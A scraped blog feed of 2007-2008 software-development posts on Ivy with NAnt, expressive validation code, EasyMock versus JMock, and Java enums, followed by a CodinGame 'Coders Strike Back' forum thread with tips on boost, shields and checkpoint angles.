<p>Then we need to define the actual dependencies assigning to each one the right configuration(in this scenario both are extending the default one):</p> <script src=""></script> <p>Finally we need to define the pattern in the <em>ivy:retrieve</em> tag</p> <script src=""></script> <img src="" height="1" width="1" alt=""/> Integrate Ivy in a dotNet build 2008-04-17T00:00:00+00:00 <p>I’m currently involved in a .Net shop and I’m working on redesigning the build pipeline (good old CI stuff). <a href="">Ivy</a> appeared in our brainstorming sessions as a solution for having a more defined control on the projects dependencies requirement.</p> <p>The problem is that currently (but you never know about the future ;-) ) there isn’t a .Net native port of Ivy.</p> <p>This can be solved using the <em>exec</em> tag from your NAnt script and using java as an external program. Here is the bit to add to your NAnt build script:</p> <script src=""></script> <img src="" height="1" width="1" alt=""/> Essap 2008 2008-04-09T00:00:00+00:00 For the third year the European Summer School of Agile Programming(Essap) is a great opportunity to learn more about Agile Methodologies. <a href="" title="Essap">Here</a> the website of the school: check it out. <img src="" height="1" width="1" alt=""/> Just a bit of confusion... 2008-03-29T00:00:00+00:00 From a job offer recently received: [...]Please note it is essential that applicants have worked in a structured development environment ideally **utilising the Agile (SCRUM, XP) methodology or any other similar methods such as Waterfall**, RAD or RUP[...] Just awesome. <img src="" height="1" width="1" alt=""/> Express your business requirements through your code 2008-03-02T00:00:00+00:00 <p>Last week I was working with a colleague on the implementation of a fairly simple validation of a character: the criteria for validation was that the character had to be lower case or a digit.</p> <p>Looking at the Javadoc we spotted a couple of useful methods in the Character class: <em>isLetterOrDigit</em> -this method is pretty straightforward- and is <em>LowerCase</em> that returns false for upper case letter and everything is not a letter.</p> <p>The code we wrote looked like:</p> <pre><code>if (!isLowerCase(aCharacter) &&!isDigit(aCharacter)) { //... //error !! } </code></pre> <p>All the tests passed. Fairly simple and coincise solution.</p> <p>But..<strong>are we actually expressing the business requirements ?</strong></p> <p><strong>No.</strong> Not al all.</p> <p>Our code is not communicating clearly what we’re trying to achieve: the API is not clearly expressing that punctuations are not allowed.</p> <p>The expected behaviour is there but the code is still not in an ideal shape: we need to be able to clearly express what we really need to validate.</p> <p>The refactored code looked like:</p> <pre><code>if (!isALowerCaseCharacter(aCharacter) && !isDigit(aCharacter)) { </code></pre> <p>where <em>isALowerCaseCharacter</em> was:</p> <pre><code>private boolean isALowerCaseCharacter(char aCharacter) { return isLetter(aCharacter) && isLowerCase(aCharacter); } </code></pre> <p>This is better. We are might be increasing the actual complexity of the condition but our code is now expressive: if in 3 months time we pick up this code again we clearly know what business rule we’re applying without looking at <<em>any<</em> additional resource.</p> <p>The code now is <strong>communicating our intention</strong>.</p> <img src="" height="1" width="1" alt=""/> EasyMock experience 2008-02-23T00:00:00+00:00 <p>For the last two weeks I’ve worked with <a href="">EasyMock</a> and coming from a JMock background it’s easy to make a comparison between the two libraries.</p> <p>I have to say that I’m less than impressed by EasyMock: the whole concept of the two different states (recording and active) for the mock library looks unreasonable.</p> <p>Let’s look on how we can create a mock with EasyMock:</p> <p><code> MyInterface mock =EasyMock.mock(MyInterface.class); //expectation mock.myMethod(); //activation step mock.replay(); //actual call to the mock mock.myMethod(); //verification that the method has been called mock.verify(); </code></p> <p>There’s also a more DSLish style of defining expectations, that I personally prefer (it differentiates clearly the definition of the expectation from the actual method call).</p> <p><code> EasyMock.expects(mock.myMethod());</code></p> <p>This style is the only one available when the expectation is more complex:</p> <p><code> EasyMock.expects(mock.myMethod()).andReturn(true);</code></p> <p>But what if I want to define that a certain method will be called on the stub, no matter how many times ?</p> <p>I can either use a different way of creating the mock: <code> EasyMock.createNiceMock(MyInterface.class); </code></p> <p>or using the DSL way:</p> <p><code>EasyMock.expects(mock.myMethod()).anyTimes() </code></p> <p>I think that having two ways of defining the same expectation is pretty confusing, specially when you’re using the API for the first time. What I’m looking for in a mock library is the capability of defining the expectations in a coincise but expressive way and then inject the dependency in the object I want to test.</p> <p><a href="" title="JMock">JMock2</a> is pretty close, but I have to admit the the inner class notation with all those curly brackets around is not helping.</p> <p>A fellow <a href="">ThoughtWorker</a> have just released <a href="" title="Mockito" target="_blank">Mockito</a>: it looks like it’s taking the best from EasyMock and JMock and put in a single library. Might be worth a try.</p> <img src="" height="1" width="1" alt=""/> The last "D" in TDD means more than just "Development" 2007-12-05T00:00:00+00:00 <a href="" target="_blank">Here</a> some interesting thoughts on TDD. <img src="" height="1" width="1" alt=""/> Java enum as a strategy pattern 2007-10-27T00:00:00+00:00 <p>I’ve always thought that Java enums can represent a simple but powerful strategy pattern baked into Java.</p> <p>This idea has been reinforced by <a href="">this article</a> by Ralph Johnson of GoF fame, where while talking about design patterns and language design he says:</p> <p><cite> Design patterns are not made of stone. […] Over time, we should change our programming languages so that they build in things that used to be patterns. </cite></p> <p>This evolution of modern languages will (hopefully) increase the number of people that are really able to write Object Oriented code, modelling behaviours and not only using objects as a dull namespace construct.</p> <img src="" height="1" width="1" alt=""/> Useless comment 2007-04-25T00:00:00+00:00 <script src=""></script> Can a name attribute in an Entity class represent something different than the name of the entity? <img src="" height="1" width="1" alt=""/> | https://feeds.feedburner.com/lucagrulla | CC-MAIN-2018-51 | en | refinedweb |
Standard 2D-View provider. More...
#include <CViewProviderGuiComp.h>
Standard 2D-View provider.
It allows setting of display calibration and supports
i2d::ICalibrationProvider to get it.
Definition at line 22 of file CViewProviderGuiComp.h.
Definition at line 29 of file CViewProviderGuiComp.h.
Definition at line 30 of file CViewProviderGuiComp.h.
Background type for the 2D-view.
Definition at line 35 of file CViewProviderGuiComp.h.
Get list of menu commands.
These commands will be integrated in global menu system, independent from actual selected view. For support of normal pull down menu, depth of this tree structure should be at least 3.
Reimplemented from ibase::ICommandsProvider.
Called when items should be removed from specified view.
Implements iqt2d::IViewProvider.
Get ID indentifing this view.
Typically this ID is 0 for first view, 1 for the second etc.
Implements iqt2d::IViewProvider.
Reimplemented from iqtgui::CGuiComponentBase.
Reimplemented from icomp::CComponentBase..
Implements imod::CMultiModelDispatcherBase.
© 2007-2017 Witold Gantzke and Kirill Lepskiy | http://ilena.org/TechnicalDocs/Acf/classiqt2d_1_1_c_view_provider_gui_comp.html | CC-MAIN-2018-51 | en | refinedweb |
curl / libcurl / API / curl_easy_setopt / CURLOPT_MAXFILESIZE_LARGE
CURLOPT_MAXFILESIZE_LARGE explained
NAME
CURLOPT_MAXFILESIZE_LARGE - maximum file size allowed to download
SYNOPSIS
#include <curl/curl.h> CURLcode curl_easy_setopt(CURL *handle, CURLOPT_MAXFILESIZE_LARGE, curl_off_t size);
DESCRIPTION
Pass a curl_off_t as parameter. This allows you to specify the maximum size (in bytes) of a file to download. If the file requested is found.
DEFAULT
PROTOCOLS
EXAMPLE
CURL *curl = curl_easy_init(); if(curl) { CURLcode ret; curl_off_t ridiculous = 1 << 48; curl_easy_setopt(curl, CURLOPT_URL, ""); /* refuse to download if larger than ridiculous */ curl_easy_setopt(curl, CURLOPT_MAXFILESIZE_LARGE, ridiculous); ret = curl_easy_perform(curl); }
AVAILABILITY
RETURN VALUE
Returns CURLE_OK if the option is supported, and CURLE_UNKNOWN_OPTION if not.
SEE ALSO
CURLOPT_MAXFILESIZE, CURLOPT_MAX_RECV_SPEED_LARGE
This HTML page was made with roffit. | https://curl.haxx.se/libcurl/c/CURLOPT_MAXFILESIZE_LARGE.html | CC-MAIN-2018-51 | en | refinedweb |
Laravel Enum Package
Laravel Enum is a package by Ben Sampson that adds support for creating enums in PHP and includes a generator for Laravel. Here’s an example of what an Enum class looks like using this package:
<?php namespace App\Enums; use BenSampo\Enum\Enum; final class UserType extends Enum { const Administrator = 0; const Moderator = 1; const Subscriber = 2; const SuperAdministrator = 3; }
Check out the readme for a list of methods and other examples of how to use this package.
One of my favorite features I noticed from the readme is controller validation using a supplied
EnumValue rule:
<?php public function store(Request $request) { $this->validate($request, [ 'user_type' => ['required', new EnumValue(UserType::class)], ]); }
You can also validate on the keys using the
EnumKey rule:
<?php public function store(Request $request) { $this->validate($request, [ 'user_type' => ['required', new EnumKey(UserType::class)], ]); }
Another Laravel-specific feature that you might find useful is localization:
<?php // resources/lang/en/enums.php use App\Enums\UserType; return [ 'user-type' => [ UserType::Administrator => 'Administrator', UserType::SuperAdministrator => 'Super administrator', ], ]; // resources/lang/es/enums.php use App\Enums\UserType; return [ 'user-type' => [ UserType::Administrator => 'Administrador', UserType::SuperAdministrator => 'Súper administrador', ], ];
Learn More
Ben Sampson wrote a post Using enums in Laravel which is an excellent follow-up resource to the inspiration and thought process behind his package.
You can view the Laravel Enum source code and get installation instructions from the BenSampo/laravel-enum GitHub repository. | https://laravel-news.com/laravel-enum-package | CC-MAIN-2019-13 | en | refinedweb |
–> Click the link to the right to download the associated configuration files for this lab article
Introduction
XML is widely used in software systems for persistent data, exchanging data between a web service and client, and in configuration files. A misconfigured XML parser can leave a critical flaw in an application. Processing of untrusted XML streams can result in a range of exploits, including remote code execution and sensitive data being read. This tutorial will explain to information security specialists and programmers the fundamentals of XML and XML external entity (XXE) injection and it will go through the major XXE issues found on Google and Facebook servers. Moreover, this tutorial provides a hands-on lab for identifying and exploiting XXE vulnerabilities, along with practical guidance on how to secure a code-supporting XML input parsing.
Case
An XML to JSON converter tool
Outline
- What is XML?
- What is an XML external entity (XXE)?
- What could be more fun than exploiting this vulnerability to access Google and Facebook servers?
- How to set up your vulnerable environment
- How to identify/detect XXE vulnerability?
- How to exploit the XEE injection for fun and profit
- How to mitigate security risks of XML external entity processing
What Is XML?
XML, which stands for extensible markup language, is a markup language designed to store data. It is widely adopted by software systems, used to store configuration files, and in web services it assists in exchanging data between a consumer and a service provider.
What Is XML External Entity (XXE)?
XXE: XML external entities allow the inclusion of data dynamically from a given resource (local or remote) at the time of parsing. This feature can be exploited by attackers to include malicious data from external URIs or confidential data residing on the local system. If XML parsers are not configured to prevent or limit external entities, they are forced to access the resources specified by the URI.
<?XML version="1.0"?> <!DOCTYPE myFile [ <!ELEMENT myFile ANY > <!ENTITY xxe SYSTEM ""> ]> <myFile>&xxe;</myFile>
This is a well-formed XML document. During parsing, the parser will replace the external entity “&xxe;” with the content of the system file “/etc/passwd”, which contains confidential information and might be disclosed. Another example: if the URI ‘’ is replaced by a link to a malicious server that never responds, the parser might end up waiting, thus causing delays in the subsequent processes.
Successful exploitation of this vulnerability may result in disclosure of sensitive data, denial of service, or an attacker gaining unauthorized access to the system resources. If an XML parser does not block external entity expansion and is able to access the referred content, one user may be able to gain unauthorized access to the data of other users, leading to a breach of confidentiality.
Below, I have detailed the characteristics of XXE according to the OWASP Top 10 in 2017: is not commonly tested, as of 2017.
Impacts: These flaws can be used to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack, and execute other attacks. The business impact depends on the protection needs of all affected application and data.
What could be more fun than exploiting this vulnerability to access Google and Facebook servers?
Security researchers were able to exploit XXE vulnerability on the Google Toolbar button gallery product. This product allows users to customize their toolbar buttons. Programmers can style it by editing and uploading an XML file. It turned out that the XML parser interprets the DTD blindly. The researchers managed to craft a malicious XML file and uploaded it to the Google production server, letting them read sensitive files. Google awarded a bug bounty of $10,000 for this finding. A security expert managed to attack Facebook servers with an MS Word document, allowing him a remote code execution. The bug specifically affected OpenID. Facebook awarded a bounty of $6,000 for alerting them to this bug.
How do we identify/detect an XXE vulnerability?
To answer this question, you may set up an experimentation lab. We take a real-world scenario of an XML to JSON converter similar to.
The following installation and configuration was tested on a Debian9 machine.
The tool is written on top of a Flask framework and uses simplejson. First, install the dependencies:
$ pip install flask $ pip install simplejson
Next, run the application:
$ python index.py
At this level, the application is up and running and you can start your experiment.
First of all, in general cases you should verify that the application accepts XML as input (directly or via upload).
Source code analysis tools can help detect XXE in source code, although manual code review is the best alternative when the source code is provided. Dynamic analysis testing tools require additional manual steps to detect and exploit this vulnerability.
The second step is to ensure that document type definitions (DTDs) is enabled in the parser.
To do this, change the phone value by &xxe; and click convert. You should get an error message:
Entity 'xxe' not defined, line 5, column 14 (line 5)
This means that the application tried to process XML external entities and therefore it is vulnerable.
Attack Scenario
Once you have discovered the vulnerability, you can forge and provide malicious XML input.
The first attack scenario is to attempt to extract data from the server.
Let’s read /etc/passwd from server by pre-pending a definition of xxe entity:
<!DOCTYPE infosecinstitute[
<!ENTITY xxe SYSTEM “”>
]>
<card>
<name>Toto</name>
<title>Researcher</title>
<phone>&xxe;</phone>
</card>
Now you should see the content of /etc/passwd file and you can get read the secret file from the server.
An additional attack scenario can probe the server’s private network or attempt a denial of service attack.
Mobile Device Penetration Testing
Mitigate Security Risks of XML External Entity Processing
Because software systems that improperly use vulnerable parsers are also vulnerable, we recommend that developers of such systems pay special attention to preventing such attacks if they decide to adopt a third-party XML parser, even if it is provided by a high-profile vendor such as Oracle or Microsoft. In order to block XXE attacks, software developers should gain full understanding of the XML parser that they are considering adopting and avoid its insecure features (e.g., using schema instead of DTD). If external entity references are required, they should refer to trusted sources only. Known vulnerabilities of the parser and their fixes should be investigated and input sanitization should be done before parsing XML content. Adequate security testing of the parser should also be performed.
Recommendations for Parser Developers: Developers of XML parsers need to be fully aware of all potential XML-based attacks and should be able to provide countermeasures wherever possible. It was observed during our experiment that some vulnerabilities can be exploited because of the features allowed in the default configurations of XML parsers. Parser developers should provide secure default configurations and provide alerts when any potentially insecure feature is enabled via making changes to the default configurations. Parser developers should perform security testing of their parsers. They should also provide better documentation, including the potential risks of enabling any feature. This would guide software developers to secure use of their parsers.
Implement positive (“whitelisting”) server-side input validation, filtering, or sanitization to prevent hostile data within XML documents, headers, or nodes.
Verify that XML or XSL file upload functionality validates incoming XML using XSD validation or similar.
Back to the lab, to fix the bug, Python LXML parser can be supplied as an additional argument to various parse functions of the lxml API.
from lxml import etree parser = etree.XMLParser(resolve_entities=False) etree.fromstring(xml, parser=parser)
Conclusion
In this article, we studied the potential of a major type of XML-based attacks, specifically XML external entities (XXE) that may undermine today’s XML parsers and systems making use of those parsers. We proposed a hands-on lab to learn how to identify, detect, exploit, and mitigat XXE vulnerability based on vulnerable XML parsers. We showed the impact of this type of vulnerability on many known services, making such alarming vulnerability a warning for software developers to take appropriate security measures before using these vulnerable XML parsers in their software development projects. Parser developers need to fix the problems and/or provide better documentation to help developers configure such parsers to secure their usage.
References | https://resources.infosecinstitute.com/xml-vulnerabilities-still-attractive-targets-attackers/ | CC-MAIN-2019-13 | en | refinedweb |
Scala Supertypes to Typeclasses
After a few months of writing about Cats, it is great to take a small break. This pause isn’t to start anything new, but to build foundations for the upcoming posts. If you are looking to learn about those scary FP words, you will need to understand what is below.
Chances are, if you are looking to learn about cats, you will find the start quite easy. Hopefully, I can make the end easy too.
When you write code, it is a good idea to aim for generic logic. You never know when you might need to solve another very similar problem.
The simplest way to avoid duplication is by writing functions. They allow to execute many times the same logic. This logic should be based on input arguments, and return output ones.
def maxOption(elements: List[Int]): Option[Int] = {
if(elements.isEmpty) None
else Some(elements.max)
}
The above function is quite simple. It finds the largest element in a
List[Int], or returns
None. It is a safe alternative to the built in one.
Our
maxOption function is a great way to avoid redefining the if statement, but it isn’t very generic. It only works with
List[Int].
def maxOption(elements: Array[Float]): Option[Float] = ???
def maxOption(elements: Set[String]): Option[String] = ???
def maxOption(elements: Vector[Boolean]): Option[Boolean] = ???
...
It would be silly to define the function for every combination of types. This can be avoided with abstraction.
A supertype represent functionalities that are inherited by another type. This is often represented with animals, shapes, or vehicles.
class Bicycle(
cadence: Int,
gear: Int,
speed: Int,
)
class MountainBike(
cadence: Int,
gear: Int,
speed: Int,
seatHeight: Int,
) extends Bicycle(cadence, gear, speed)
Array,
List, and
Set have many supertypes in common. Picking the smallest common denominator would increase compatibility with other types.
The only need for
maxOption is for the supertype to implement
isEmpty, and
max. Those can be found in the
GenTraversableOnce trait.
import scala.collection.GenTraversableOnce
def maxOption(elements: GenTraversableOnce[Int]): Option[Int] = {
if(elements.isEmpty) None
else Some(elements.max)
}
GenTraversableOnce has over 350 subclasses. By using it instead of
List, we increased compatibility, but
Int is still very limiting.
Int, like
String,
Boolean, and many other types, only extend
Any, and
AnyVal. Those types can’t be compared to identify the maximum value.
def maxOption(elements: GenTraversableOnce[Any]): Option[Any] = ???
Instead of using a supertype,
Int should be implemented as a generic. This allows the caller to specify any type, but it also means the function must handle all types.
def maxOption[A](elements: GenTraversableOnce[A]): Option[A] = ???
Once again this seems like the wrong approach, until you attempt to compile the code.
scala> import scala.collection.GenTraversableOnce
import scala.collection.GenTraversableOnce
scala> def maxOption[A](elements: GenTraversableOnce[A]) = {
| if(elements.isEmpty) None
| else Some(elements.max)
| }
<console>:14: error: No implicit Ordering defined for A.
else Some(elements.max)
^
The compiler raises an error. It doesn’t know how to identify a maximum
A, but it could with an
implicit Ordering.
Ordering is a trait used to sort elements. It allows the compiler to identify the
max value.
The function can take
Ordering as an extra argument
def maxOption[A](elements: GenTraversableOnce[A])
(implicit ord: Ordering[A]): Option[A] = {
if(elements.isEmpty) None
else Some(elements.max)
}
Or a type bound
def maxOption[A: Ordering](elements: GenTraversableOnce[A]) = {
if(elements.isEmpty) None
else Some(elements.max)
}
The second is just syntactic sugar for the first.
Ordering is a typeclass. Similarly to the supertype, it defines, and sometimes implement functionality. There is more to it, but I will keep that for the next post.
Lets see how
Ordering could be used for
maxOption if it was written for an auction company. It would need to return the highest
Bid.
case class Bid(
owner: String,
amount: Float)
The wrong approach is to remove the generic, and replace it by
Bid. This would work, but the function wouldn’t be generic anymore.
Instead, a new implementation of
Ordering should be created.
implicit val bidOrdering = new Ordering[Bid] {
def compare(x: Bid, y: Bid): Int = x.amount.compare(y.amount)
}
As long as the implicit is in scope, the function can be invoked with any
GenTraversableOnce[Bid].
Supertypes offer a simple hierarchy explanation that makes it easy for people to use. Typeclasses, with the implicits, aren’t as welcoming, but offer the same functionality, and more.
Next time, with the basics out of the way, I will focus on the more part. | https://medium.com/@pvinchon/scala-generics-and-type-classes-3495bc059d1f | CC-MAIN-2019-13 | en | refinedweb |
2011-02-23 15:34:53 8 Comments
I have logging function as follows.
logging.basicConfig( filename = fileName, format = "%(levelname) -10s %(asctime)s %(message)s", level = logging.DEBUG ) def printinfo(string): if DEBUG: logging.info(string) def printerror(string): if DEBUG: logging.error(string) print string
I need to login the line number, stack information. For example:
1: def hello(): 2: goodbye() 3: 4: def goodbye(): 5: printinfo() ---> Line 5: goodbye()/hello()
How can I do this with Python?
SOLVED
def printinfo(string): if DEBUG: frame = inspect.currentframe() stack_trace = traceback.format_stack(frame) logging.debug(stack_trace[:-1]) if LOG: logging.info(string)
gives me this info which is exactly what I need.
DEBUG 2011-02-23 10:09:13,500 [ ' File "/abc.py", line 553, in <module>\n runUnitTest(COVERAGE, PROFILE)\n', ' File "/abc.py", line 411, in runUnitTest\n printinfo(string)\n']
Related Questions
Sponsored Content
30 Answered Questions
[SOLVED] How do I concatenate two lists in Python?
- 2009-11-12 07:04:09
- y2k
- 1757682 View
- 1942 Score
- 30 Answer
- Tags: python list concatenation
6 Answered Questions
[SOLVED] How do I get the number of elements in a list in Python?
34 Answered Questions
[SOLVED] How to read a file line-by-line into a list?
25 Answered Questions
[SOLVED] How can I safely create a nested directory in Python?
- 2008-11-07 18:56:45
- Parand
- 2193035 View
- 3437 Score
- 25 Answer
- Tags: python exception path directory operating-system
33 Answered Questions
[SOLVED] How to get the current time in Python
17 Answered Questions
[SOLVED] How can I make a time delay in Python?
26 Answered Questions
[SOLVED] How can I remove a trailing newline in Python?
10 Answered Questions
[SOLVED] Why is reading lines from stdin much slower in C++ than Python?
- 2012-02-21 02:17:50
- JJC
- 227903 View
- 1636 Score
- 10 Answer
- Tags: python c++ benchmarking iostream getline
2 Answered Questions
43 Answered Questions
[SOLVED] How can I represent an 'Enum' in Python?
- 2008-08-31 15:55:47
- sectrean
- 723160 View
- 1146 Score
- 43 Answer
- Tags: python python-3.x enums
@barny 2019-03-11 17:18:35
This is based on @mouad's answer but made more useful (IMO) by including at each level the filename (but not its full path) and line number of the call stack, and by leaving the stack in most-recently-called-from (i.e. NOT reversed) order because that's the way I want to read it :-)
Each entry has file:line:func() which is the same sequence as the normal stacktrace, but all on the same line so much more compact.
You may need to add an extra f_back if you have any intervening calls to produce the log text.
Produces output like this:
I only need this stacktrace in two key functions, so I add the output of callers into the text in the logger.debug() call, like htis:
@bsimmons 2014-10-31 19:33:39
Late answer, but oh well.
Another solution is that you can create your own formatter with a filter as specified in the docs here. This is a really great feature as you now no longer have to use a helper function (and have to put the helper function everywhere you want the stack trace). Instead, a custom formatted implements it directly into the logs themselves.
Note: In the above code I trim the last 5 stack frames. This is just for convenience and so that we don't show stack frames from the python logging package itself.(It also might have to be adjusted for different versions of the logging package)
@ncoghlan 2011-02-23 22:40:08
As of Python 3.2, this can be simplified to passing the
stack_info=Trueflag to the logging calls. However, you'll need to use one of the above answers for any earlier version.
@Will S 2015-07-24 09:43:17
The docs are kind of wordy with regards to this. I had missed that, thanks!
@mouad 2011-02-23 16:06:33
Here is an example that i hope it can help you:
Result:
@Duncan 2011-02-23 16:01:06
Current function name, module and line number you can do simply by changing your format string to include them.
Most people only want the stack when logging an exception, and the logging module does that automatically if you call
logging.exception(). If you really want stack information at other times then you will need to use the traceback module for extract the additional information you need.
@Scott Stafford 2015-11-25 18:28:06
All parameters are documented here: docs.python.org/2/library/logging.html#logrecord-attributes.
@Erik Aronesty 2016-02-26 20:07:52
hard part is getting the stack_trace[:-1]
@Duncan 2016-02-28 20:03:34
@ErikAronesty, yes and that was already sufficiently covered by other answers when I posted, so I didn't include it in mine.
@Dunes 2011-02-23 15:47:33
Use stack_trace[:-1] to avoid including method/printinfo in the stack trace.
@ShadowRanger 2016-03-04 20:43:13
Instead of doing
stack_trace[:-1](which means it needs to format one frame more than you use, then slice the result), couldn't you do:
frame = inspect.currentframe(1)so you get the stack without the top layer, so
format_stackdoesn't need to process it, and the return from
format_stackrequires no manipulation?
@yanjost 2011-02-23 15:50:24
Look at traceback module
@Daniel Roseman 2011-02-23 15:46:44
Use the traceback module. | https://tutel.me/c/programming/questions/5093075/how+can+i+log+current+line+and+stack+info+with+python | CC-MAIN-2019-13 | en | refinedweb |
I apologize in advance if this is the wrong forum to be posing this question. I'd post to IBM's "developerWorks" forum, but it's currently in read-only mode until April 15, 2013.
JBoss AS version: 7.1.1.Final
Filenet Content Engine (CE) version: 5.1 fix pack 002
Environment: Microsoft Windows using Active Directory
Server 1: JBoss Application - exposes JAVA web services which integrate with the Filenet CE web services
Server 2: Websphere Network Deployment - exposes Filenet CE web services
Issue: Company policy requires JBoss to run as a windows service using a Domain account. It also dictates that the domain account be used to connect to the Filenet CE Web Services. The authentication between the two services is handled using JAAS.
Currently, the Filenet username and password are stored in a properties file (in plain text). I understand it's possible to use JBoss Vault to mask the password but that goes against our standard. It works like this:
//Jace.jar
import com.filenet.api.util.UserContext;
import com.filenet.api.core.Connection;
import javax.security.auth.Subject;
import com.filenet.api.core.Factory;
import com.company.util.PropertyUtil;
.
.
.
String connectionString = "<connString here>";
Connection conn = Factory.Connection.getConnection(connectionString);
UserContext uc = UserContext.get();
Subject sub = UserContext.createSubject(conn, PropertyUtil.getProperty("filenet.username"), PropertyUtil.getProperty("filenet.password"), "FileNetP8WSI"); //where "FileNetP8WSI is the JAAS stanza
uc.pushSubject(sub);
From here, a good JAAS subject is retrieved and the Filenet CE web services can be contacted for CRUD operations in the object store (document repository).
However, I'd like it to work like this (or some other variation):
String jbossWindowsServiceUsername = <routine to fetch domain user account JBoss is currently running as>;
String jbossWindowsServicePassword = <routine to fetch domain user's password JBoss is currently running as>;
String connectionString = "<connString here>";
Connection conn = Factory.Connection.getConnection(connectionString);
UserContext uc = UserContext.get();
Subject sub = UserContext.createSubject(conn, jbossWindowsServiceUsername, jbossWindowsServicePassword, "FileNetP8WSI"); //where "FileNetP8WSI is the JAAS stanza
uc.pushSubject(sub);
Any help this group can provide would be wonderful. Thanks in advance.
Joe M. | https://developer.jboss.org/message/808083?tstart=0 | CC-MAIN-2019-13 | en | refinedweb |
1 /* crypto/asn1/a_dup.c */ #include "cryptlib.h" 61 #include <openssl/asn1.h> 62 63 #ifndef NO_OLD_ASN1 64 65 void *ASN1_dup(i2d_of_void *i2d, d2i_of_void *d2i, void *x) 66 { 67 unsigned char *b, *p; 68 const unsigned char *p2; 69 int i; 70 char *ret; 71 72 if (x == NULL) 73 return (NULL); 74 75 i = i2d(x, NULL); 76 b = OPENSSL_malloc(i + 10); 77 if (b == NULL) { 78 ASN1err(ASN1_F_ASN1_DUP, ERR_R_MALLOC_FAILURE); 79 return (NULL); 80 } 81 p = b; 82 i = i2d(x, &p); 83 p2 = b; 84 ret = d2i(NULL, &p2, i); 85 OPENSSL_free(b); 86 return (ret); 87 } 88 89 #endif 90 91 /* 92 * ASN1_ITEM version of dup: this follows the model above except we don't 93 * need to allocate the buffer. At some point this could be rewritten to 94 * directly dup the underlying structure instead of doing and encode and 95 * decode. 96 */ 97 98 void *ASN1_item_dup(const ASN1_ITEM *it, void *x) 99 { 100 unsigned char *b = NULL; 101 const unsigned char *p; 102 long i; 103 void *ret; 104 105 if (x == NULL) 106 return (NULL); 107 108 i = ASN1_item_i2d(x, &b, it); 109 if (b == NULL) { 110 ASN1err(ASN1_F_ASN1_ITEM_DUP, ERR_R_MALLOC_FAILURE); 111 return (NULL); 112 } 113 p = b; 114 ret = ASN1_item_d2i(NULL, &p, i, it); 115 OPENSSL_free(b); 116 return (ret); 117 } | https://fossies.org/linux/openssl/crypto/asn1/a_dup.c | CC-MAIN-2019-13 | en | refinedweb |
(For9 - 05 May 2018 21:04:58 GMT9 - 05 May 2018 21:04:58 GMT9 - 05 May 2018 21:04:58 GMT
This is a listing of all documented functions in the PDL distribution. Alphabetical Listing of PDL Functions EOD $onldc = $PDL::onlinedoc; # new PDL::Doc ('/tmp/pdlhash.dbtxt'); $db = $onldc->ensuredb; while (my ($key,$val) = each %$db) { my $strip =...CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
!!!!!!!!!!!!!!!!!!!!!!!!!!WARNING!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! As of PDL-2.006_04, the direction of the FFT/IFFT has been reversed to match the usage in the FFTW library and the convention in use generally. !!!!!!!!!!!!!!!!!!!!!!!!!!WARNING!!!...CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
This is version 1.008 of the PDL FAQ, a collection of frequently asked questions about PDL - the Perl Data Language....CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
This module provides the functions used by PDL to overload the basic mathematical operators ("+ - / *" etc.) and functions ("sin sqrt" etc.) It also includes the function "log10", which should be a perl function so that we can overload it! Matrix mul...CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
PDL has been compiled with WITH_BADVAL set to 1. Therefore, you can enter the wonderful world of bad value support in PDL. This module is loaded when you do "use PDL", "Use PDL::Lite" or "PDL::LiteF". Implementation details are given in PDL::BadValue...CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
A simple cookbook how to create piddles manually. It covers both the Perl and the C/XS level. Additionally, it describes the PDL core routines that can be accessed from other modules. These routines basically define the PDL API. If you need to access...CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
An implementation of online docs for PDL....CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
These packages implements a couple of functions that should come in handy when debugging your PDL scripts. They make a lot of sense while you're doing rapid prototyping of new PDL code, let's say inside the perldl or pdl2 shell....CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
This module explains how to get help with a PDL problem and how, when, and where to submit a bug report. In the future it may be extended to provide some sort of automated bug reporting capability....CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT9 - 05 May 2018 21:04:58 GMT
Loads the smallest possible set of modules for PDL to work, importing only those functions always defined by PDL::Core) into the current namespace ("pdl", "piddle", "barf" and "null"). This is the absolute minimum set for PDL. Access to other functio...CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
This subclass of PDL allows one to manipulate PDLs of 'byte' type as if they were made of fixed length strings, not just numbers. This type of behavior is useful when you want to work with charactar grids. The indexing is done on a string level and n...CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
This page documents useful idioms, helpful hints and tips for using Perl Data Language v2.0. Help Use "help help" within *perldl* or *pdl2* or use the "pdldoc" program from the command line for access to the PerlDL documentation. HTML versions of the...CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
Methods and functions for type conversions, PDL creation, type conversion, threading etc....CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
This module aims to contain useful functions. Honest....CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
A meta document listing the documented PDL modules and the PDL manual documents...CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
This file is an attempt to list the major user-visible changes between PDL versions 1.0 and 2.0....CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT | https://metacpan.org/search?q=dist%3APDL | CC-MAIN-2018-30 | en | refinedweb |
activating SHIELD after BOOST is not able to affect BOOST
your X,Y values are not able neither to be the same like your opponent nor to even be in 400 units from him - u both have radius of 400, so your radiuses are summed up
Can someone help me How can I calculate the nextCheckpointAngle in Gold league?
Look up a trig function called ATan2. Depending on the language you're using, it might be included in the standard math package. It will give the angle between a point and the origin. If you subtract your position from the checkpoint's position (or maybe vice-versa, I get mixed up) and use ATan2 on that, it'll be the angle from you to the checkpoint instead.
Sorry guys for the question but i can't use BOOST too...
In C# I wrote :Console.WriteLine(nextCheckpointX + " " + nextCheckpointY + " " + BOOST);I simply replaced the Thurst value by the keyword BOOST, but it always says me that BOOST doesn't exists in the current context... Why if it's a keyword ?
Console.WriteLine(nextCheckpointX + " " + nextCheckpointY + " BOOST");
Thank you, i didn't understood to put it as a string
Hello,
After I have submitted twice my code. It is impossible to join the Bot Programming "Coders strike back".The error message is:"An error occurred (#-1): "internal error". Please contact coders@codingame.com".
Can you help ?
try to refresh?
